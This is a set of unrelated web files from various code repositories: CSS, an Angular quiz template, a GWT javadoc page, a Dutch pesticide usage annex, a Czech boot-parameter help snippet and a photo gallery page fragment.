1.2s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 1.2s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 1.2s; animation-timing-function: ease; animation-fill-mode: both; } .animate7{ -webkit-animation-duration: .6s; -webkit-animation-delay: 1.4s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 1.4s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 1.4s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 1.4s; animation-timing-function: ease; animation-fill-mode: both; } .animate8{ -webkit-animation-duration: .6s; -webkit-animation-delay: 1.6s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 1.6s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 1.6s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 1.6s; animation-timing-function: ease; animation-fill-mode: both; } .animate9{ -webkit-animation-duration: .6s; -webkit-animation-delay: 1.8s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 1.8s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 1.8s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 1.8s; animation-timing-function: ease; animation-fill-mode: both; }
public/js/templates/profiles.html
hamhec/zagame
<div class="card" layout="column"> <h2 class="md-headline card-header" translate="PROFILE_HEADER" translate-values='{ name: profiles.domain.title }'></h2> <div class="card-content"> <md-list> <md-list-item class="md-3-line"> <img class="md-avatar" hide-sm src="{{ profiles.domain.image }}" /> <div class="md-list-item-text" flex> <h3 class="card-subheader">{{ profiles.domain.title }}</h3> <h4 translate="DOMAIN_NBR_CONCEPTS" translate-values='{ n: profiles.domain.nbr_concepts }'></h4> <p>{{ profiles.domain.text }}</p> </div> </md-list-item> </md-list> <md-divider></md-divider> <md-list> <form role="form" method="POST"> <md-list-item class="md-3-line dashed-divider" ng-repeat="profile in profiles.data"> <img class="md-avatar" hide-sm src="http://www.uspto.gov/sites/default/files/styles/wysiwyg_small/public/Help%20-%20Question%20Mark.png?itok=LL3t9IXZ" /> <div class="md-list-item-text"> <h3>{{ profile.designation }}</h3> <h4>{{ profile.question }}</h4> <md-radio-group layout-wrap layout="row" ng-model="profiles.data[$index].answer"> <md-radio-button ng-repeat="value in profile.possible_values" value="{{value.id}}">{{value.value}}</md-radio-button> </md-radio-group> </div> </md-list-item> <div layout="column" layout-align="center center"> <md-button class="md-primary md-raised" aria-label="Play" type="button" flex ng-click="profiles.submit()" translate="PROFILE_PLAY"> </md-button></div> </form> </md-list> </div> <md-divider></md-divider> </div>
web/WEB-INF/classes/gwt-2.6.0/doc/javadoc/com/google/gwt/user/client/ui/class-use/HasOneWidget.html
JakaCikac/dScrum
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <TITLE> Uses of Interface com.google.gwt.user.client.ui.HasOneWidget (Google Web Toolkit Javadoc) </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Interface com.google.gwt.user.client.ui.HasOneWidget (Google Web Toolkit Javadoc)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> GWT 2.6.0</EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?com/google/gwt/user/client/ui//class-useHasOneWidget.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="HasOneWidget.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Interface<br>com.google.gwt.user.client.ui.HasOneWidget</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui">HasOneWidget</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.google.gwt.logging.client"><B>com.google.gwt.logging.client</B></A></TD> <TD>Log handlers and related classes for java.util.logging support in GWT.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.google.gwt.user.client.ui"><B>com.google.gwt.user.client.ui</B></A></TD> <TD>Widgets, Panels, and other user-interface classes.&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.google.gwt.logging.client"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui">HasOneWidget</A> in <A HREF="../../../../../../../com/google/gwt/logging/client/package-summary.html">com.google.gwt.logging.client</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Classes in <A HREF="../../../../../../../com/google/gwt/logging/client/package-summary.html">com.google.gwt.logging.client</A> that implement <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui">HasOneWidget</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/logging/client/LoggingPopup.html" title="class in com.google.gwt.logging.client">LoggingPopup</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A simple popup to show log messages, which can be resized, minimized, and dragged to a different location.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.google.gwt.user.client.ui"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui">HasOneWidget</A> in <A HREF="../../../../../../../com/google/gwt/user/client/ui/package-summary.html">com.google.gwt.user.client.ui</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Classes in <A HREF="../../../../../../../com/google/gwt/user/client/ui/package-summary.html">com.google.gwt.user.client.ui</A> that implement <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui">HasOneWidget</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/CustomScrollPanel.html" title="class in com.google.gwt.user.client.ui">CustomScrollPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A custom version of the <A HREF="../../../../../../../com/google/gwt/user/client/ui/ScrollPanel.html" title="class in com.google.gwt.user.client.ui"><CODE>ScrollPanel</CODE></A> that allows user provided scrollbars.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/DecoratedPopupPanel.html" title="class in com.google.gwt.user.client.ui">DecoratedPopupPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A <A HREF="../../../../../../../com/google/gwt/user/client/ui/PopupPanel.html" title="class in com.google.gwt.user.client.ui"><CODE>PopupPanel</CODE></A> that wraps its content in a 3x3 grid, which allows users to add rounded corners.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/DecoratorPanel.html" title="class in com.google.gwt.user.client.ui">DecoratorPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A <A HREF="../../../../../../../com/google/gwt/user/client/ui/SimplePanel.html" title="class in com.google.gwt.user.client.ui"><CODE>SimplePanel</CODE></A> that wraps its contents in stylized boxes, which can be used to add rounded corners to a <A HREF="../../../../../../../com/google/gwt/user/client/ui/Widget.html" title="class in com.google.gwt.user.client.ui"><CODE>Widget</CODE></A>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/DialogBox.html" title="class in com.google.gwt.user.client.ui">DialogBox</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A form of popup that has a caption area at the top and can be dragged by the user.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/FocusPanel.html" title="class in com.google.gwt.user.client.ui">FocusPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A simple panel that makes its contents focusable, and adds the ability to catch mouse and keyboard events.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/FormPanel.html" title="class in com.google.gwt.user.client.ui">FormPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A panel that wraps its contents in an HTML &lt;FORM&gt; element.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/LazyPanel.html" title="class in com.google.gwt.user.client.ui">LazyPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Convenience class to help lazy loading.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/PopupPanel.html" title="class in com.google.gwt.user.client.ui">PopupPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A panel that can "pop up" over other widgets.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/ResizeLayoutPanel.html" title="class in com.google.gwt.user.client.ui">ResizeLayoutPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A simple panel that <A HREF="../../../../../../../com/google/gwt/user/client/ui/ProvidesResize.html" title="interface in com.google.gwt.user.client.ui"><CODE>ProvidesResize</CODE></A> to its one child, but does not <A HREF="../../../../../../../com/google/gwt/user/client/ui/RequiresResize.html" title="interface in com.google.gwt.user.client.ui"><CODE>RequiresResize</CODE></A>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/ScrollPanel.html" title="class in com.google.gwt.user.client.ui">ScrollPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A simple panel that wraps its contents in a scrollable area.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/SimpleLayoutPanel.html" title="class in com.google.gwt.user.client.ui">SimpleLayoutPanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;A simple panel that <A HREF="../../../../../../../com/google/gwt/user/client/ui/ProvidesResize.html" title="interface in com.google.gwt.user.client.ui"><CODE>ProvidesResize</CODE></A> to its one child.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/SimplePanel.html" title="class in com.google.gwt.user.client.ui">SimplePanel</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Base class for panels that contain only one widget.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../com/google/gwt/user/client/ui/HasOneWidget.html" title="interface in com.google.gwt.user.client.ui"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> GWT 2.6.0</EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?com/google/gwt/user/client/ui//class-useHasOneWidget.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="HasOneWidget.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
doc/ctgb_html/08397.html
ivorbosloper/pestileaks
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>Bijlage behorende bij de toelating voor het middel …………………, …</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CONTENT="Ministerie van Landbouw, Natuurbeheer en Visserij"> <META NAME="CREATED" CONTENT="20040806;16300000"> <META NAME="CHANGEDBY" CONTENT="Ministerie van Landbouw, Natuurbeheer en Visserij"> <META NAME="CHANGED" CONTENT="20050201;10370000"> <META NAME="Info 1" CONTENT=""> <META NAME="Info 2" CONTENT=""> <META NAME="Info 3" CONTENT=""> <META NAME="Info 4" CONTENT=""> <STYLE TYPE="text/css"> <!-- @page { size: 8.27in 11.69in; margin-right: 0.98in; margin-top: 0.98in; margin-bottom: 0.5in } P { margin-bottom: 0.08in; direction: ltr; color: #000000; widows: 2; orphans: 2 } P.western { font-family: "Arial", sans-serif; font-size: 11pt; so-language: nl-NL } P.cjk { font-family: "Times New Roman", serif; font-size: 11pt } P.ctl { font-family: "Arial", sans-serif; font-size: 12pt; so-language: ar-SA } H1 { margin-top: 0in; margin-bottom: 0in; direction: ltr; color: #000000; widows: 2; orphans: 2 } H1.western { font-family: "Arial", sans-serif; font-size: 11pt; so-language: nl-NL } H1.cjk { font-family: "Times New Roman", serif; font-size: 11pt } H1.ctl { font-family: "Arial", sans-serif; font-size: 12pt; so-language: ar-SA; font-weight: normal } H3 { margin-top: 0in; margin-bottom: 0in; direction: ltr; color: #000000; widows: 2; orphans: 2; text-decoration: underline } H3.western { font-family: "Arial", sans-serif; font-size: 11pt; so-language: nl-NL; font-weight: normal } H3.cjk { font-family: "Times New Roman", serif; font-size: 11pt; font-weight: normal } H3.ctl { font-family: "Arial", sans-serif; font-size: 12pt; so-language: ar-SA; font-weight: normal } --> </STYLE> </HEAD> <BODY LANG="en-US" TEXT="#000000" DIR="LTR"> <H1 LANG="nl-NL" CLASS="western">Bijlage behorende bij de toelating voor het middel SPRITEX SUPER AEROSOL, 8397 N</H1> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> A.</P> <H3 LANG="nl-NL" CLASS="western" ALIGN=CENTER>WETTELIJK GEBRUIKSVOORSCHRIFT</H3> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Toegestaan is uitsluitend het gebruik als middel ter bestrijding van vliegende insecten in woon-, werk- en andere verblijfsruimten.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> B.</P> <H3 LANG="nl-NL" CLASS="western" ALIGN=CENTER>GEBRUIKSAANWIJZING</H3> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Doodt vliegende insecten zoals vliegen, muggen en motten.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Deuren en ramen van het te behandelen vertrek sluiten.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Vervolgens vanuit het middel van de ruimte in de vier bovenhoeken spuiten.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">In totaal niet langer dan 1 seconde per 10 m<SUP>3</SUP> inhoud van de ruimte.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Minstens 50 cm afstand houden van wanden of voorwerpen.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">De ruimte na behandeling 10 minuten gesloten houden, daarna grondig luchten.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Wageningen, 13 januari 1992</P> <DIV TYPE=FOOTER> <P LANG="nl-NL" ALIGN=CENTER STYLE="margin-top: 0.45in; margin-bottom: 0in"> Pagina <SDFIELD TYPE=PAGE SUBTYPE=RANDOM FORMAT=PAGE>1</SDFIELD> van <SDFIELD TYPE=DOCSTAT SUBTYPE=PAGE FORMAT=ARABIC>1</SDFIELD></P> </DIV> </BODY> </HTML>
themes/BlankOn/help-install/cs/main::opt::o_ide.html
mdamt/gfxboot-blankon
<h3> <a name="o_ide">Parametry jádra: ide</a> </h3> <p>IDE je na rozdíl od SCSI obvykle používáno na pracovních stanicích. V případě výskytu problémů s IDE systémem můžete použít parametr: <ul><li><em>ide=nodma</em> -- vypnout DMA pro IDE jednotky</li></ul></p>
bundles/frontend/public/css/carousel.css
jbonagura/IndioBR
.carousel-control { padding-top:10%; width:5%; }
gallery/ekmg_tttc/TTTC4c.html
CorwynRavenwing/sca.ekmg
caption --> <p align="center" class="pcaption">TTTC4c.jpg</p> <!-- Custom Fields --> <!-- voting --> <!-- Comments --><br></div><table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td class="navtableborderbegin"> <!-- 'Classic' Photo Navigator --> <table width="100%" cellspacing="0" cellpadding="0" id="g-navtable-bottom" dir="ltr"> <tr> <td height="18">12 of 23</td> <td style="text-align: right" class="g-borderleft" ><div class="nowrap">Jump to: <select name="goto" onChange="document.location.href=this.value" size="1"> </select> </div></td> </tr> </table> </td> </tr> <tr> <td class="navtableborderend"> <table style="" width="100%" border="0" cellspacing="0" cellpadding="0" class="modnavboxmid"> <tr> <td class="bread" style="text-align:right; padding-left: 5px; padding-right: 5px;"> Gallery: <a href="../albums.php.html">East Kingdom Galleries&nbsp;<img src="../images/icons/navigation/nav_home.gif" alt="navigate up" title="navigate up"></a> Album: <a href="../EK-Metalsmiths-Guild.html">EK Metalsmiths Guild&nbsp;<img src="../images/icons/navigation/nav_home.gif" alt="navigate up" title="navigate up"></a> Album: <a href="../album04.html">EKMG1&nbsp;<img src="../images/icons/navigation/nav_home.gif" alt="navigate up" title="navigate up"></a> Album: <a href="../ekmg_tttc.html">Tailor to the Crown&nbsp;<img src="../images/icons/navigation/nav_home.gif" alt="navigate up" title="navigate up"></a> </td> </tr> </table> </td> </tr> </table> <form name="sflyc4p" action="http://www.shutterfly.com/c4p/UpdateCart.jsp" method="post"> <input type=hidden name=addim value="1"> <input type=hidden name=protocol value="SFP,100"> <input type=hidden name=pid value="C4PP"> <input type=hidden name=psid value="GALL"> <input type=hidden name=referid value="gallery"> <input type=hidden name=returl value="this-gets-set-by-javascript-in-onClick"> <input type=hidden name=imrawheight-1 value="511"> <input type=hidden name=imrawwidth-1 value="360"> <input type=hidden name=imbkprnta-1 value="TTTC4c.jpg"> </form> <form method="post" name="photoAccess" action="http://www.tkqlhce.com/click-1660787-10381744"> <input type="hidden" name="cb" value="CB_GP"> <input type="hidden" name="redir" value="true"> <input type="hidden" name="returnUrl" value="this-gets-set-by-javascript-in-onClick"> <input type="hidden" name="imageId" value="TTTC4c.jpg"> <input type="hidden" name="imgWidth" value="360"> <input type="hidden" name="imgHeight" value="511"> </form> <table width="100%" cellspacing="0" cellpadding="0" class="modfooter"> <tr> <td valign="top" align="left"> <!-- The Gallery code version number, linked to the Gallery home page --> <span class="fineprint"> <a href="http://gallery.sourceforge.net" target="_blank"><img src="../images/gallery1.gif" alt="Powered by Gallery v1" title="Powered by Gallery v1"></a> <!-- 1.5.8-debian1 --> </span> </td> </tr> </table> </td> </tr> </table> </body> </html>
index.html
aurpita/aurpita.github.io
